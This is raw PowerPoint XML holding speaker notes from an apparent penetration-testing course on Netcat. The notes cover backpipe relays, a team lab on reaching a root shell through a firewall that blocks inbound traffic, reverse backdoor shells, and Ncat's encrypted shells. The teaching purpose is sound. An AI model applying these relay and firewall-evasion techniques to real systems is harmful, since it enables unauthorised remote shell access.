              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-I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9600" y="152400"/>
            <a:ext cx="5502275" cy="4127500"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>The output from the Netcat Listener is piped into the netcat client. In other words the STDIN of the Netcat listener is connected to the Attacker machine, and the STDOUT is piped into the STDIN of the Netcat client part of the relay machine. This takes care of one direction of the communication – but what about the response?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ED08DB6E-F7AE-42AB-BB6A-322F1BCCEC84}" type="slidenum">
              <a:rPr lang="en-IE" smtClean="0"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IE"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9600" y="152400"/>
            <a:ext cx="5502275" cy="4127500"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>Next the STDOUT of the Netclient is connected to our backpipe using the 1&gt;Backpipe directive (redirect STDOUT to a file, in this case Backpipe). This gets us the shells responses as far as the backpipe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>Note the 1 here in Linux means redirect the output of STDOUT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ED08DB6E-F7AE-42AB-BB6A-322F1BCCEC84}" type="slidenum">
              <a:rPr lang="en-IE" smtClean="0"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IE"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9600" y="152400"/>
            <a:ext cx="5502275" cy="4127500"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>Finally the backpipe is connected back up to the STDIN of the netcat listener, which itself is connected to the STDOUT of the attackers machine – so the attacker can see the results!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>Note the 0 here in Linux means STDIN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>Take a minute or two to wrap your head around – so lets try in in an exercise</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ED08DB6E-F7AE-42AB-BB6A-322F1BCCEC84}" type="slidenum">
              <a:rPr lang="en-IE" smtClean="0"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IE"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9600" y="152400"/>
            <a:ext cx="5502275" cy="4127500"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Ok – now lets have some fun with Netcat relays</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>First try out a simple, but less effective One Directional relay</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Then try the backpipe relay we just tried. You could have Terminal 1 and 2 in different folders on the Kali machine so that you can easily use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ga-IE" b="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ga-IE" b="0" baseline="0" dirty="0" smtClean="0"/>
              <a:t> to figure out which you are using, or change the title of the Terminal using Terminal-&gt;Set Title</a:t>
            </a:r>
            <a:endParaRPr lang="ga-IE" b="1" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ED08DB6E-F7AE-42AB-BB6A-322F1BCCEC84}" type="slidenum">
              <a:rPr lang="en-IE" smtClean="0"/>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IE"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9600" y="152400"/>
            <a:ext cx="5502275" cy="4127500"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" b="0" baseline="0" dirty="0" smtClean="0"/>
              <a:t>One last thing before moving onwards with the course – there are a number of good Netcat alternatives out there.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" b="0" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" b="0" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Socat adds a number of features on top of Netcat, most notably support for SSL. Netcat offers no encryption support as standard.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" b="0" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" b="0" baseline="0" dirty="0" smtClean="0"/>
              <a:t>CryptCat is similar but adds even more encryption features.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" b="0" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" b="0" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Perhaps the most useful of all is Ncat. Ncat was created in 2005 as “Netcat for the 21st century”. It is included as standard in the Nmap toolkit. Two major drawbacks of Netcat for pen-testers is the lack of encryption (which means things get caught by IDS), and the lack of Authentication (any other attackers can make use of your shells!). Ncat gets around both of these problems as well as a bunch of other features such as supporting SOCKS4 and HTTP CONNECT proxies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" b="0" baseline="0" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ga-IE" b="0" baseline="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ga-IE" b="0" baseline="0" dirty="0" smtClean="0"/>
              <a:t>To get an idea how it works have a look at the slide. The first line sets up a normal shell on a windows machine with SSL enabled that only accepts connection from a particular machine, and the second line connects to it. This gives you a encrypted shell with authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" b="0" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" b="0" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Tools like Ncat, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ga-IE" b="0" baseline="0" dirty="0" smtClean="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ga-IE" b="0" baseline="0" dirty="0" smtClean="0"/>
              <a:t>your RAT of choice are always a better option than Netcat when the choice is available – but in cases where is not, Netcat really is hard to beat as one of the most powerful tools in any pen-testers library</a:t>
            </a:r>
            <a:endParaRPr lang="ga-IE" b="1" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ED08DB6E-F7AE-42AB-BB6A-322F1BCCEC84}" type="slidenum">
              <a:rPr lang="en-IE" smtClean="0"/>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IE"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D08DB6E-F7AE-42AB-BB6A-322F1BCCEC84}" type="slidenum">
              <a:rPr lang="en-IE" smtClean="0"/>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IE"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9600" y="152400"/>
            <a:ext cx="5502275" cy="4127500"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="1050" baseline="0" dirty="0" smtClean="0"/>
              <a:t>For the first attack scenario we are going to see how you can make use of tools like netcat and tunnelling to get around a firewall.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" sz="1050" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="1050" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Lets first describe the idea of the scenario – and then I’ll explain how to set things up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" sz="105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E" sz="1050" baseline="0" dirty="0" smtClean="0"/>
              <a:t>On the left we have our evil hackers, sitting out side the target network. On the right we have the target server. The attackers have already compromised the server and have a non-privileged reverse shell running. They also have a shell running on port 4444 with root privileges (in reality this could be a vulnerable application – but for our exercise we will just make it a shell)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" sz="1050" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="1050" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This server is sitting behind a firewall that blocks all incoming connections, but which allows outbound packets (and the ACK packets that respond to them). So in other words it has a packet filter that drops all incoming packets with the SYN flag set, but allows packets that have the ACK bit set</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" sz="1050" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="1050" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The challenge here is how to let the attackers remotely access the root shell on port 4444, by only entering commands in the non-root shell. And remember the attacker can not connect in directly to the root shell because of the firewall.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ED08DB6E-F7AE-42AB-BB6A-322F1BCCEC84}" type="slidenum">
              <a:rPr lang="en-IE" smtClean="0"/>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IE"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9600" y="152400"/>
            <a:ext cx="5502275" cy="4127500"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" sz="1200" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>To simulate this setup a bit we will be using teams of two people and netcat. Also having two people lets you chat together and try and puzzle out the best way to solve this challenge. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" sz="1200" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" sz="1200" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>To make things easier we will use a single person lab machine for the setup – but try and figure out the attack together.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" sz="1200" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" sz="1200" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Remember simply setting up another netcat listener is not good enough, as it would only have limited privileges – you need to connect to the existing listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" sz="1200" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" sz="1200" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>There may of course be more than one way to do this – and if you find a different one than I thought of – thats great! But I will show my own solution at the end – and also give you a hint after about 5-10 minutes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ED08DB6E-F7AE-42AB-BB6A-322F1BCCEC84}" type="slidenum">
              <a:rPr lang="en-IE" smtClean="0"/>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IE"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9600" y="152400"/>
            <a:ext cx="5502275" cy="4127500"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="ga-IE"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D08DB6E-F7AE-42AB-BB6A-322F1BCCEC84}" type="slidenum">
              <a:rPr lang="en-IE" smtClean="0"/>
              <a:pPr/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IE"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IE" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76804" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4200C84A-0DA9-4C0C-8FCE-FC9AA26B1EC3}" type="slidenum">
              <a:rPr lang="en-IE" smtClean="0"/>
              <a:pPr/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IE"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9600" y="152400"/>
            <a:ext cx="5502275" cy="4127500"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Netcat is often called the “Hacker Swiss Army Knife” and for good reason. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The man page describes it as a “simple utility which reads and writes data across a network connections using the TCP or UDP protocol”. Very straightforward, but very useful.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Its also a tool many of you will have used at some point if not daily – but lets check something with a show of hands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Hands up if you have ever used Netcat?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Keep your hand up if you ever used Netcat to transfer files?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>How about as a reverse backdoor shell?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Finally have you ever used Netcat as a port scanner through a proxy relay also setup using netcat?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So hopefully everyone has at least something they can learn from this section </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" baseline="0" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>Lets start with a background on Netcat. It was first written by The Hobbit back in 1996 for UNIX, and later updated to Windows by Weld Pond (Cult of the Dead Cow) in 1998. It can commonly be found installed on a lot of UNIX based systems you will come across.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ED08DB6E-F7AE-42AB-BB6A-322F1BCCEC84}" type="slidenum">
              <a:rPr lang="en-IE" smtClean="0"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-I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685800" y="228600"/>
            <a:ext cx="5502275" cy="4127500"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84995" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Netcat has two modes, client and server mode – and its important to really get your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" b="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> head around what is happening in both modes. It can seem simplistic but wrapping your head around it makes the more complex stuff we will look at easier.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" sz="1200" b="0" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" b="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>By default</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1200" b="0" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
